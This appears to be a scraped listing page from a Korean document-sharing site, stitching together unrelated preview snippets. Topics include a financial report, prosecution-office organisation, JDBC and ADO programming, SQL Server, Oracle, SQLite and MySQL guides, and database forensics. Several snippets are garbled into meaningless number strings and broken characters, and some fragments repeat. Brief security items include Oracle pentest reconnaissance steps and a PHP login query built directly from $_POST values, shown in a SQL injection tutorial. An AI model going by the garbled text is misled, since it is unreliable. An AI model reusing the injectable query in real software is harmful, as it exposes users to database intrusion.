ISSN 1975-667 215. 12 215. 12 6 5 4 3 2 1 6 5 4 3 2 1 3 145 14 135 13 13 143. 14.7 1.4 9.2 1 7 45 4 35 41.4 85 76.9 76.8 3 7 8 75 125 4 4 1 25 8 6 4 2 2 15 1 5 15 15 36 35.3 36 14 13 12 11 14
More information第 1 節 組 織 11 第 1 章 檢 察 의 組 織 人 事 制 度 등 第 1 項 大 檢 察 廳 第 1 節 組 대검찰청은 대법원에 대응하여 수도인 서울에 위치 한다(검찰청법 제2조,제3조,대검찰청의 위치와 각급 검찰청의명칭및위치에관한규정 제2조). 대검찰청에 검찰총장,대
第 1 章 檢 察 의 組 織 人 事 制 度 등 第 1 節 組 織 11 第 1 章 檢 察 의 組 織 人 事 制 度 등 第 1 項 大 檢 察 廳 第 1 節 組 대검찰청은 대법원에 대응하여 수도인 서울에 위치 한다(검찰청법 제2조,제3조,대검찰청의 위치와 각급 검찰청의명칭및위치에관한규정 제2조). 대검찰청에 검찰총장,대검찰청 차장검사,대검찰청 검사,검찰연구관,부
More information쉽게 풀어쓴 C 프로그래밊
Power Java 제 27 장데이터베이스 프로그래밍 이번장에서학습할내용 자바와데이터베이스 데이터베이스의기초 SQL JDBC 를이용한프로그래밍 변경가능한결과집합 자바를통하여데이터베이스를사용하는방법을학습합니다. 자바와데이터베이스 JDBC(Java Database Connectivity) 는자바 API 의하나로서데이터베이스에연결하여서데이터베이스안의데이터에대하여검색하고데이터를변경할수있게한다.
More information歯박지원-구운몽.PDF
wwwnovel21com (c) Copyright Joeun Community All Rights Reserved ,,,,,,,,,,,, 1 2 ( ) ( ),,, ( ) ( ) ( ), ( ) ( ) ( ) " ( ) 3 ( ) " ( ) " ( ) ( ) ( ) " ( ) " ",,, ( ) ", ( ), 4 ( ), " ( ), () ",,,, 5 (
More information*금안14(10)01-도비라및목차1~12
ISSN 1975-667 21. 1 21. 1 3 1 8 6 2 1 8 6 2 15 1 13 12 11 1 15 12 9 6 3 36 32 28 2 75 85 83 81 79 77 5 1 8 6 1 8 6 1 8 25 2 2 2 6 15 1 2-2 5-5 3 2 3 2 1 1-1 -1-2 -2 6 1 13 12 1 8 6 16 12 2.
More informationMS-SQL SERVER 대비 기능
Business! ORACLE MS - SQL ORACLE MS - SQL Clustering A-Z A-F G-L M-R S-Z T-Z Microsoft EE : Works for benchmarks only CREATE VIEW Customers AS SELECT * FROM Server1.TableOwner.Customers_33 UNION ALL SELECT
More informationSQL Developer Connect to TimesTen 유니원아이앤씨 DB 기술지원팀 2010 년 07 월 28 일 문서정보 프로젝트명 SQL Developer Connect to TimesTen 서브시스템명 버전 1.0 문서명 작성일 작성자
SQL Developer Connect to TimesTen 유니원아이앤씨 DB 팀 2010 년 07 월 28 일 문서정보 프로젝트명 SQL Developer Connect to TimesTen 서브시스템명 버전 1.0 문서명 작성일 2010-07-28 작성자 김학준 최종수정일 2010-07-28 문서번호 20100728_01_khj 재개정이력 일자내용수정인버전
More information초보자를 위한 ADO 21일 완성
ADO 21, 21 Sams Teach Yourself ADO 2.5 in 21 Days., 21., 2 1 ADO., ADO.? ADO 21 (VB, VBA, VB ), ADO. 3 (Week). 1, 2, COM+ 3.. HTML,. 3 (week), ADO. 24 1 - ADO OLE DB SQL, UDA(Universal Data Access) ADO.,,
More informationPowerPoint Presentation
FORENSICINSIGHT SEMINAR SQLite Recovery zurum herosdfrc@google.co.kr Contents 1. SQLite! 2. SQLite 구조 3. 레코드의삭제 4. 삭제된영역추적 5. 레코드복원기법 forensicinsight.org Page 2 / 22 SQLite! - What is.. - and why? forensicinsight.org
More informationInsertColumnNonNullableError(#colName) 에해당하는메시지출력 존재하지않는컬럼에값을삽입하려고할경우, InsertColumnExistenceError(#colName) 에해당하는메시지출력 실행결과가 primary key 제약에위배된다면, Ins
Project 1-3: Implementing DML Due: 2015/11/11 (Wed), 11:59 PM 이번프로젝트의목표는프로젝트 1-1 및프로젝트 1-2에서구현한프로그램에기능을추가하여간단한 DML을처리할수있도록하는것이다. 구현한프로그램은 3개의 DML 구문 (insert, delete, select) 을처리할수있어야한다. 테이블데이터는파일에저장되어프로그램이종료되어도사라지지않아야한다.
More informationALTIBASE HDB Patch Notes
ALTIBASE HDB 6.5.1.5.6 Patch Notes 목차 BUG-45643 암호화컬럼의경우, 이중화환경에서 DDL 수행시 Replication HandShake 가실패하는문제가있어수정하였습니다... 4 BUG-45652 이중화에서 Active Server 와 Standby Server 의 List Partition 테이블의범위조건이다른경우에 Handshake
More informationWINDOW FUNCTION 의이해와활용방법 엑셈컨설팅본부 / DB 컨설팅팀정동기 개요 Window Function 이란행과행간의관계를쉽게정의할수있도록만든함수이다. 윈도우함수를활용하면복잡한 SQL 들을하나의 SQL 문장으로변경할수있으며반복적으로 ACCESS 하는비효율역
WINDOW FUNCTION 의이해와활용방법 엑셈컨설팅본부 / DB 컨설팅팀정동기 개요 Window Function 이란행과행간의관계를쉽게정의할수있도록만든함수이다. 윈도우함수를활용하면복잡한 SQL 들을하나의 SQL 문장으로변경할수있으며반복적으로 ACCESS 하는비효율역시쉽게해결할수있다. 이번화이트페이퍼에서는 Window Function 중순위 RANK, ROW_NUMBER,
More informationPowerPoint Presentation
6 장 SQL (section 4-6) 목차 SECTION 01 SQL 의개요 1-1 SQL의역사 1-2 SQL의유형별종류 SECTION 02 데이터정의어 (DDL) 2-1 스키마 2-2 테이블생성 (CREATE TABLE) 2-3 테이블변경 (ALTER TABLE) 2-4 테이블제거 (DROP TABLE) 2-5 제약조건 SECTION 03 데이터조작어 (DML)
More informationDocsPin_Korean.pages
Unity Localize Script Service, Page 1 Unity Localize Script Service Introduction Application Game. Unity. Google Drive Unity.. Application Game. -? ( ) -? -?.. 준비사항 Google Drive. Google Drive.,.. - Google
More informationuntitled
PowerBuilder 連 Microsoft SQL Server database PB10.0 PB9.0 若 Microsoft SQL Server 料 database Profile MSS 料 (Microsoft SQL Server database interface) 行了 PB10.0 了 Sybase 不 Microsoft 料 了 SQL Server 料 PB10.0
More informationuFOCS
1 기 : 기 UF_D_V250_002 기 기 기 품 ufocs 기 v2.5.0 히기기기기기기기기기 기 Manual 기 version 기 3.2 기품 2011.7.29 히기 345-13 1 Tel : 02-857-3051 Fax : 02-3142-0319 : http://www.satu.co.kr 2010 SAT information Co., Ltd. All
More informationPowerPoint Presentation
FORENSIC INSIGHT; DIGITAL FORENSICS COMMUNITY IN KOREA SQL Server Forensic AhnLab A-FIRST Rea10ne unused6@gmail.com Choi Jinwon Contents 1. SQL Server Forensic 2. SQL Server Artifacts 3. Database Files
More information윈도우시스템프로그래밍
데이타베이스 MySQL 을위한 MFC 를사용한 ODBC 프로그래밍 2013.05.15. 오병우 컴퓨터공학과금오공과대학교 http://www.apmsetup.com 또는 http://www.mysql.com APM Setup 설치발표자료참조 Department of Computer Engineering 2 DB 에속한테이블보기 show tables; 에러발생
More information본문서는 초급자들을 대상으로 최대한 쉽게 작성하였습니다. 본문서에서는 설치방법만 기술했으며 자세한 설정방법은 검색을 통하시기 바랍니다. 1. 설치개요 워드프레스는 블로그 형태의 홈페이지를 빠르게 만들수 있게 해 주는 프로그램입니다. 다양한 기능을 하는 플러그인과 디자인
스마일서브 CLOUD_Virtual 워드프레스 설치 (WORDPRESS INSTALL) 스마일서브 가상화사업본부 Update. 2012. 09. 04. 본문서는 초급자들을 대상으로 최대한 쉽게 작성하였습니다. 본문서에서는 설치방법만 기술했으며 자세한 설정방법은 검색을 통하시기 바랍니다. 1. 설치개요 워드프레스는 블로그 형태의 홈페이지를 빠르게 만들수 있게
More information*금안 도비라및목차1~17
ISSN 1975-667 216. 6 금융안정보고서 216. 6 6 5 4 3 2 1 6 5 4 3 2 1 3 15 145 14 135 13 13 1 125 4 7 1 1 2 1 5 5 5 2 4 4 4 18 3 3 3 16 2 2 45 4 35 14 12 37.7 36.9.7-1.5 3-1 3 2 1 4 25 2 15 1 5-5
More informationuntitled
(shared) (integrated) (stored) (operational) (data) : (DBMS) :, (database) :DBMS File & Database - : - : ( : ) - : - : - :, - DB - - -DBMScatalog meta-data -DBMS -DBMS - -DBMS concurrency control E-R,
More informationAPI STORE 키발급및 API 사용가이드 Document Information 문서명 : API STORE 언어별 Client 사용가이드작성자 : 작성일 : 업무영역 : 버전 : 1 st Draft. 서브시스템 : 문서번호 : 단계 : Docum
API STORE 키발급및 API 사용가이드 Document Information 문서명 : API STORE 언어별 Client 사용가이드작성자 : 작성일 : 2012.11.23 업무영역 : 버전 : 1 st Draft. 서브시스템 : 문서번호 : 단계 : Document Distribution Copy Number Name(Role, Title) Date
More informationORANGE FOR ORACLE V4.0 INSTALLATION GUIDE (Online Upgrade) ORANGE CONFIGURATION ADMIN O
Orange for ORACLE V4.0 Installation Guide ORANGE FOR ORACLE V4.0 INSTALLATION GUIDE...1 1....2 1.1...2 1.2...2 1.2.1...2 1.2.2 (Online Upgrade)...11 1.3 ORANGE CONFIGURATION ADMIN...12 1.3.1 Orange Configuration
More informationPowerPoint 프레젠테이션
HTML5 웹프로그래밍입문 부록. 웹서버구축하기 1 목차 A.1 웹서버시스템 A.2 PHP 사용하기 A.3 데이터베이스연결하기 2 A.1 웹서버시스템 3 웹서버의구축 웹서버컴퓨터구축 웹서버소프트웨어설치및실행 아파치 (Apache) 웹서버가대표적 서버실행프로그램 HTML5 폼을전달받아처리 PHP, JSP, Python 등 데이터베이스시스템 서버측에데이터를저장및효율적관리
More informationLec. 2: MySQL and RMySQL
1 / 26 Lec. 2: MySQL and RMySQL Instructor: SANG-HOON CHO DEPT. OF STATISTICS AND ACTUARIAL SCIENCES Soongsil University 1. Introduction 2 / 26 이번강의에서는 MySQL 관계형데이터베이스관리시스템 (RDBMS, Relational Database
More information소만사 소개
개인정보 라이프사이클에 걸친 기술적 보호대책 - DB방화벽과 PC내 개인정보 무단 저장 검출 및 암호화솔루션 2009.10 소만사 소개 소만사 [소프트웨어를 만드는 사람들 ] 개인정보보호 토털 솔루션 전문업체, 해외수출 기업 금융/통신/대기업/공공 600여 고객 보안1세대 기업 97년 창립(13년) 마이크로소프트 선정 - 10년 후 세계적 소프트웨어 기업 장영실상(IR52),
More information<C0CCBCBCBFB52DC1A4B4EBBFF82DBCAEBBE7B3EDB9AE2D313939392D382E687770>
i ii iii iv v vi 1 2 3 4 가상대학 시스템의 국내외 현황 조사 가상대학 플랫폼 개발 이상적인 가상대학시스템의 미래상 제안 5 웹-기반 가상대학 시스템 전통적인 교수 방법 시간/공간 제약을 극복한 학습동기 부여 교수의 일방적인 내용전달 교수와 학생간의 상호작용 동료 학생들 간의 상호작용 가상대학 운영 공지사항,강의록 자료실, 메모 질의응답,
More informationPowerPoint 프레젠테이션
Spider For MySQL 실전사용기 피망플러스유닛최윤묵 Spider For MySQL Data Sharding By Spider Storage Engine http://spiderformysql.com/ 성능 8 만 / 분 X 4 대 32 만 / 분 많은 DB 중에왜 spider 를? Source: 클라우드컴퓨팅구 선택의기로 Consistency RDBMS
More information@OneToOne(cascade = = "addr_id") private Addr addr; public Emp(String ename, Addr addr) { this.ename = ename; this.a
1 대 1 단방향, 주테이블에외래키실습 http://ojcedu.com, http://ojc.asia STS -> Spring Stater Project name : onetoone-1 SQL : JPA, MySQL 선택 http://ojc.asia/bbs/board.php?bo_table=lecspring&wr_id=524 ( 마리아 DB 설치는위 URL
More information구축환경 OS : Windows 7 그외 OS 의경우교재 p26-40 참조 Windows 의다른버전은조금다르게나타날수있음 Browser : Google Chrome 다른브라우저를사용해도별차이없으나추후수업의모든과정은크롬사용 한
수업환경구축 웹데이터베이스구축및실습 구축환경 OS : Windows 7 그외 OS 의경우교재 p26-40 참조 Windows 의다른버전은조금다르게나타날수있음 Browser : Google Chrome 다른브라우저를사용해도별차이없으나추후수업의모든과정은크롬사용 http://chrome.google.com 한림대학교웹데이터베이스 - 이윤환 APM 설치 : AUTOSET6
More informationPowerPoint
.. http://www.acs.co.kr -1- .. http://www.acs.co.kr -3- ( Advanced Computer Services Co.,Ltd. ) 345-9 SK B8 ( sh_kim@acs.co.kr ) 116-81-24039 http://www.acs.co.kr, http://www.emanufacturing.co.kr (Fax)
More informationConnection 8 22 UniSQLConnection / / 9 3 UniSQL OID SET
135-080 679-4 13 02-3430-1200 1 2 11 2 12 2 2 8 21 Connection 8 22 UniSQLConnection 8 23 8 24 / / 9 3 UniSQL 11 31 OID 11 311 11 312 14 313 16 314 17 32 SET 19 321 20 322 23 323 24 33 GLO 26 331 GLO 26
More informationSQL
데이터베이스및 SQL 언어의기초 박창이 서울시립대학교통계학과 박창이 ( 서울시립대학교통계학과 ) 데이터베이스및 SQL 언어의기초 1 / 36 Part I 데이터베이스 박창이 ( 서울시립대학교통계학과 ) 데이터베이스및 SQL 언어의기초 2 / 36 데이터의구성및표현 개체 (entity): DB가표현하려는유형 / 무형적정보의대상속성 (attribute): 개체가갖는특성도메인
More informationMicrosoft Word - [2017SMA][T8]OOPT_Stage_2040 ver2.docx
OOPT Stage 2040 - Design Feesual CPT Tool Project Team T8 Date 2017-05-24 T8 Team Information 201211347 박성근 201211376 임제현 201411270 김태홍 2017 Team 8 1 Table of Contents 1. Activity 2041. Design Real Use
More informationMicrosoft Word - [Unioneinc] 특정컬럼의 통계정보 갱신_ _ldh.doc
특정 Column 통계정보갱신가이드 유니원아이앤씨 DB 사업부이대혁 2015 년 03 월 02 일 문서정보프로젝트명서브시스템명 버전 1.0 문서명 특정 Column 통계정보갱신가이드 작성일 2015-03-02 작성자 DB사업부이대혁사원 최종수정일 2015-03-02 문서번호 UNIONE-201503021500-LDH 재개정이력 일자내용수정인버전 문서배포이력
More informationA Hierarchical Approach to Interactive Motion Editing for Human-like Figures
단일연결리스트 (Singly Linked List) 신찬수 연결리스트 (linked list)? tail 서울부산수원용인 null item next 구조체복습 struct name_card { char name[20]; int date; } struct name_card a; // 구조체변수 a 선언 a.name 또는 a.date // 구조체 a의멤버접근 struct
More information컴파일러
YACC 응용예 Desktop Calculator 7/23 Lex 입력 수식문법을위한 lex 입력 : calc.l %{ #include calc.tab.h" %} %% [0-9]+ return(number) [ \t] \n return(0) \+ return('+') \* return('*'). { printf("'%c': illegal character\n",
More informationPCServerMgmt7
Web Windows NT/2000 Server DP&NM Lab 1 Contents 2 Windows NT Service Provider Management Application Web UI 3 . PC,, Client/Server Network 4 (1),,, PC Mainframe PC Backbone Server TCP/IP DCS PLC Network
More informationData Sync Manager(DSM) Example Guide Data Sync Manager (DSM) Example Guide DSM Copyright 2003 Ari System, Inc. All Rights reserved. Data Sync Manager
Data Sync Manager (DSM) Example Guide DSM Copyright 2003 Ari System, Inc. All Rights reserved. Data Sync Manager are trademarks or registered trademarks of Ari System, Inc. 1 Table of Contents Chapter1
More information배치프로그램에서튜닝대상 SQL 추출하기 엑셈컨설팅본부 /DB 컨설팅팀박성호 배치프로그램의성능문제를진단하기위해트레이스를사용할수없고, 개별 SQL 에대한성 능점검은비효율적인경우에어떻게배치프로그램의성능문제를제대로파악하고개선안을도 출할것인가? 복잡한로직을가지고있는프로그램 (
배치프로그램에서튜닝대상 SQL 추출하기 엑셈컨설팅본부 /DB 컨설팅팀박성호 배치프로그램의성능문제를진단하기위해트레이스를사용할수없고, 개별 SQL 에대한성 능점검은비효율적인경우에어떻게배치프로그램의성능문제를제대로파악하고개선안을도 출할것인가? 복잡한로직을가지고있는프로그램 ( 이후배치프로그램 ) 에대한성능문제를파악하기위해수행되는모든 SQL 에대한개별수행내역을정확히판단할수있어야한다.
More informationPowerPoint Template
설치및실행방법 Jaewoo Shim Jun. 4. 2018 Contents SQL 인젝션이란 WebGoat 설치방법 실습 과제 2 SQL 인젝션이란 데이터베이스와연동된웹서버에입력값을전달시악의적동작을수행하는쿼리문을삽입하여공격을수행 SELECT * FROM users WHERE id= $_POST[ id ] AND pw= $_POST[ pw ] Internet
More informationOracle hacking 작성자 : 임동현 작성일 2008 년 10 월 11 일 ~ 2008 년 10 월 19 일 신규작성 작성내용
Oracle hacking 작성자 : 임동현 (ddongsbrk@naver.com) 작성일 2008 년 10 월 11 일 ~ 2008 년 10 월 19 일 신규작성 작성내용 Skill List 1. Oracle For Pentest 1. Find TNS Listener (Default 1521 port) (with nmap or amap) 2. Get the
More information제목 레이아웃
웹해킹이라고무시하는것들보소 2017.07.10 RUBIYA805[AT]GMAIL[DOT]COM SQL Injection 끝나지않은위협 2017.07.10 RUBIYA805[AT]GMAIL[DOT]COM Who am I 정도원 aka rubiya Penetration tester Web application bughuter Pwned 20+ wargame @kr_rubiya
More informationFD¾ØÅÍÇÁ¶óÀÌÁî(Àå¹Ù²Þ)-ÀÛ¾÷Áß
Copyright (c) 1999-2002 FINAL DATA INC. All right reserved Table of Contents 6 Enterprise for Windows 7 8 Enterprise for Windows 10 Enterprise for Windows 11 12 Enterprise for Windows 13 14 Enterprise
More information뇌를자극하는 SQL Server 2012 (1 권 ) 1 권 : 기본편 < 이것만은알고갑시다 > 모범답안 1 장 1. (1) Microsoft (2) Oracle (3) IBM (4) Oracle (5) Micr
1 권 : 기본편 < 이것만은알고갑시다 > 모범답안 1 장 1. (1) Microsoft (2) Oracle (3) IBM (4) Oracle (5) Microsoft 2. (2) 3. 처리속도가빠르며, 별도의비용이들지않는다. 4. (4), (5) 5. (1), (4) 6. SQL Server 2005, SQL Server 2008, SQL Server 2008
More informationthesis
( Design and Implementation of a Generalized Management Information Repository Service for Network and System Management ) ssp@nile nile.postech.ac..ac.kr DPE Lab. 1997 12 16 GMIRS GMIRS GMIRS prototype
More informationuntitled
A Leader of Enterprise e-business Solution FORCS Co., LTD 1 OZ Application Getting Started (ver 5.1) 2 FORCS Co., LTD A Leader of Enterprise e-business Solution FORCS Co., LTD 3 OZ Application Getting
More information90
89 3 차원공간질의를위한효율적인위상학적데이터모델의검증 Validation of Efficient Topological Data Model for 3D Spatial Queries Seokho Lee Jiyeong Lee 요약 키워드 Abstract Keywords 90 91 92 93 94 95 96 -- 3D Brep adjacency_ordering DECLARE
More informationSpring Boot/JDBC JdbcTemplate/CRUD 예제
Spring Boot/JDBC JdbcTemplate/CRUD 예제 오라클자바커뮤니티 (ojc.asia, ojcedu.com) Spring Boot, Gradle 과오픈소스인 MariaDB 를이용해서 EMP 테이블을만들고 JdbcTemplate, SimpleJdbcTemplate 을이용하여 CRUD 기능을구현해보자. 마리아 DB 설치는다음 URL 에서확인하자.
More information歯sql_tuning2
SQL Tuning (2) SQL SQL SQL Tuning ROW(1) ROW(2) ROW(n) update ROW(2) at time 1 & Uncommitted update ROW(2) at time 2 SQLDBA> @ UTLLOCKT WAITING_SESSION TYPE MODE_REQUESTED MODE_HELD LOCK_ID1
More information6장. SQL
학습목표 SQL이 무엇인지 개념을 설명 테이블을 생성, 변경, 제거할 할 수 있다. 수 있다. 데이터를 검색, 갱신, 삽입, 삭 제할 수 있다. 뷰, 시스템 카탈로그, 저장 프 로시저, 트리거에 대한 개념 을 설명할 수 있다. 2 목차 SECTION 01 SQL의 개요 11 SQL의 역사 12 SQL의 유형별 종류 SECTION 0 21 스키마 22 테이블
More informationBusiness Agility () Dynamic ebusiness, RTE (Real-Time Enterprise) IT Web Services c c WE-SDS (Web Services Enabled SDS) SDS SDS Service-riented Architecture Web Services ( ) ( ) ( ) / c IT / Service- Service-
More information歯PLSQL10.PDF
10 - SQL*Pl u s Pl / SQL - SQL*P lus 10-1 1 0.1 PL/ SQL SQL*Pl u s. SQL*P lus 10-2 1 0.2 S QL* Pl u s PL/ S QL SQL*Pl u s, Pl / SQL. - PL/ SQL (i npu t ), (s t or e ), (r un). - PL/ SQL s cr i pt,,. -
More informationRDB개요.ppt
1 2 3 < > 1 SQL SQL 2 SQL 3 column DEPT DEPT# DNAME BUDGET D1 D2 D3 Marketing Development Research 10M 12M 5M tuple EMP EMP# ENAME DEPT# SALARY D1 40 D1 45 E1 E2 E3 Lopez Cheng Finzi D2 30 E4 Satio D2
More informationMicrosoft PowerPoint - 3장-MS SQL Server.ppt [호환 모드]
MS SQL Server 마이크로소프트사가윈도우운영체제를기반으로개발한관계 DBMS 모바일장치에서엔터프라이즈데이터시스템에이르는다양한플랫폼에서운영되는통합데이터관리및분석솔루션 2 MS SQL Server 개요 3.1 MS SQL Server 개요 클라이언트-서버모델을기반으로하는관계 DBMS로서윈도우계열의운영체제에서만동작함 오라클관계 DBMS보다가격이매우저렴한편이고,
More informationObservational Determinism for Concurrent Program Security
웹응용프로그램보안취약성 분석기구현 소프트웨어무결점센터 Workshop 2010. 8. 25 한국항공대학교, 안준선 1 소개 관련연구 Outline Input Validation Vulnerability 연구내용 Abstract Domain for Input Validation Implementation of Vulnerability Analyzer 기존연구
More informationPowerPoint 프레젠테이션
Reasons for Poor Performance Programs 60% Design 20% System 2.5% Database 17.5% Source: ORACLE Performance Tuning 1 SMS TOOL DBA Monitoring TOOL Administration TOOL Performance Insight Backup SQL TUNING
More informationPHP & ASP
단어장프로젝트 프로젝트2 단어장 select * from address where address like '% 경기도 %' td,li,input{font-size:9pt}
More informationUSER GUIDE
Solution Package Volume II DATABASE MIGRATION 2010. 1. 9. U.Tu System 1 U.Tu System SeeMAGMA SYSTEM 차 례 1. INPUT & OUTPUT DATABASE LAYOUT...2 2. IPO 중 VB DATA DEFINE 자동작성...4 3. DATABASE UNLOAD...6 4.
More information<C1A62038B0AD20B0ADC0C7B3EBC6AE2E687770>
제 8강 SQL: 관계데이터베이스언어 강의목표 관계데이타베이스언어로서상용 DBMS에서가장널리사용되는 SQL의동작원리에관하여학습하고, 이를이용하여다양한질의문을작성하는방법을습득한다 기대효과 SQL의데이터정의기능을이해한다 SQL의데이터조작기능중질의기능을이해한다 SQL의데이터조작기능중데이터갱신기능을이해한다 SQL의데이터조작기능중뷰및인덱스관련기능을이해한다 SQL 의개요
More information201502IC1AP-1 DB 구축 2015 학년도 2 학기 프로젝트특강보고서 프로젝트명 : DB 구축 ( DB ) 2015 년 11 월 20 일 지도교수 : 황치곤교수님 학과 : 정보통신공학과 1팀제출자 : 역할성명학번 조장 조재석 조원 송찬호 2
201502IC1AP-1 DB 구축 2015 학년도 2 학기 프로젝트특강보고서 프로젝트명 : DB 구축 ( DB ) 2015 년 11 월 20 일 지도교수 : 황치곤교수님 학과 : 정보통신공학과 1팀제출자 : 역할성명학번 조장 조재석 2015671001 조원 송찬호 2015671014 조원 김현종 2015671010 광운대학교정보과학교육원 정보통신공학과 61
More informationPowerPoint 프레젠테이션
사용자계정관리 운영체제실습 목차 Ⅲ. 사용자계정관리 4.1 사용자계정관리 4.2 그룹관리 4.3 사용자계정관련파일 4.4 패스워드관리 4.5 사용자신분확인 4.1 사용자계정관리 사용자생성관련명령어 사용자생성 : useradd / adduser 사용자삭제 : userdel 사용자정보변경 : usermod 패스워드설정및변경 : passwd 그룹생성관련명령어 group
More informationMicrosoft PowerPoint - GUI _DB연동.ppt [호환 모드]
GUI 설계 6 주차 DB 연동김문정 tops@yd.ac.kr 강의순서강의전환경 JDK 설치및환경설정톰캣설치및환경설정이클립스 (JEE) 설치및환경설정 MySQL( 드라이버 ) 설치및커넥터드라이브연결 DB 생성 - 계정생성이클립스에서 DB에연결서버생성 - 프로젝트생성 DB연결테이블생성및등록 2 MySQL 설치확인 mysql - u root -p MySQL 에데이터베이스추가
More informationPowerPoint 프레젠테이션
@ Lesson 2... ( ). ( ). @ vs. logic data method variable behavior attribute method field Flow (Type), ( ) member @ () : C program Method A ( ) Method B ( ) Method C () program : Java, C++, C# data @ Program
More informationInterstage5 SOAP서비스 설정 가이드
Interstage 5 Application Server ( Solaris ) SOAP Service Internet Sample Test SOAP Server Application SOAP Client Application CORBA/SOAP Server Gateway CORBA/SOAP Gateway Client INTERSTAGE SOAP Service
More information빅데이터 분산 컴퓨팅 -6
Hive Data Management Join in Hive 빅데이터분산컴퓨팅박영택 Hive 에서의 Joins Hive 에서서로다른데이터간의 Join 은빈번하게발생 Hive 에서지원하는 Join 의종류 Inner joins Outer joins(left, right, and full) Cross joins( Hive 0.1 이상버전 ) Left semi joins
More informationOrcad Capture 9.x
OrCAD Capture Workbook (Ver 10.xx) 0 Capture 1 2 3 Capture for window 4.opj ( OrCAD Project file) Design file Programe link file..dsn (OrCAD Design file) Design file..olb (OrCAD Library file) file..upd
More informationMicrosoft Word - ntasFrameBuilderInstallGuide2.5.doc
NTAS and FRAME BUILDER Install Guide NTAS and FRAME BUILDER Version 2.5 Copyright 2003 Ari System, Inc. All Rights reserved. NTAS and FRAME BUILDER are trademarks or registered trademarks of Ari System,
More informationMicrosoft Word - php12.doc
12 단원 MySQL 클라이언트사용법 1. 접속과종료 2. 사용자추가 3. 테이블생성과관리 4. 백업과복구 1/17 1. 접속과종료 1) MySQL 접속 MySQL 의모든실행파일은 MySQL 이설치된디렉토리의밑에 bin 디렉토리안에모여있습니다. bin 폴더안의 mysql.exe 파일로우리는 MySQL 에접속이가능합니다. mysql u root p 라고명령어를치고엔터를누릅니다.
More information슬라이드 1
Web Hacking Basic hardsoju hardsoju@hanmail.net Notice 본문서의저작권은저자및 Wise Guys 에게있습니다. 상업적인용도외에어떠한용도 ( 복사, 인용, 수정, 배포 ) 로도사용할수있으며 Wise Guys 의동의없이상업적인목적으로사용됨을금지합니다. 본문서로인해발생한어떠한사건에대한책임도저작권자에게는없음을밝힙니다. 본문서의잘못된부분이나지적이나추가하고싶은내용은저자에게메일을보내기바랍니다.
More informationSRC PLUS 제어기 MANUAL
,,,, DE FIN E I N T R E A L L O C E N D SU B E N D S U B M O TIO
More information강의 개요
정규화와 SELECT (II) 웹데이터베이스 학과 학생 과목 학과 지도교수 학과학번성명 수강과목 담당교수 A 김수정 A 0001 고길동 성질이론 김수정 B 허영만 A 0002 둘리 한식의멋 허영만 C 강풀 B 0003 희동이 심리학의이해 강풀 과목 _ 성적 학번 수강과목 성적 0001 성질이론 A 0001 한식의멋 C 0002 성질이론 A 0002 한식의멋
More information슬라이드 1
Pairwise Tool & Pairwise Test NuSRS 200511305 김성규 200511306 김성훈 200614164 김효석 200611124 유성배 200518036 곡진화 2 PICT Pairwise Tool - PICT Microsoft 의 Command-line 기반의 Free Software www.pairwise.org 에서다운로드후설치
More information*금안 도비라및목차1~15
ISSN 1975-667 217. 12 217. 12 3 25 2 15 1 5 3 25 2 15 1 5 3 2 18 16 14 12-1 1-2 8 3 +1.9 4 2-4 -8 1-5.4 8 4-4 -8 1,3 1,1 9 7 1,5 15 18 6 12 9 6 3 16 14 12 5 1 4 55 5 45 4 15 6 12 12 1
More information